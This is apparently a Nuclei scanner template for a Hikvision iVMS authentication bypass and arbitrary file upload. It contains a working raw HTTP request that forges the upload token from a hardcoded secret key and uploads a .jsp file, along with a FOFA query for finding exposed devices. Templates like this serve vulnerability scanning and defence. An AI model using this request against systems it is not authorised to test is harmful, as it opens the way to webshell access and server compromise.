39 lines
1.6 KiB
YAML
39 lines
1.6 KiB
YAML
id: hikvision-ivms-file-upload-bypass
|
|
|
|
info:
|
|
name: Hikvison iVMS - File Upload Bypass
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
|
|
reference:
|
|
- https://blog.csdn.net/qq_41904294/article/details/130807691
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: icon_hash="-911494769"
|
|
tags: hikvision,ivms,intrusive,fileupload,auth-bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
|
|
|
|
------WebKitFormBoundaryGEJwiloiPo
|
|
Content-Disposition: form-data; name="fileUploader";filename="{{randstr}}.jsp"
|
|
Content-Type: image/jpeg
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryGEJwiloiPo%20
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"success":true'
|
|
- '"resourceName":'
|
|
condition: and
|
|
|
|
# digest: 490a00463044022063f41bfa89c634aa9271cd12a8e97f526188d4fcb0102d9ce91c630d0d32e7fc02201cd682c8e83522c4064155836911e725b3537cabf728f97d8899d92b72e404e9:922c64590222798bb761d5b6d8e72950
|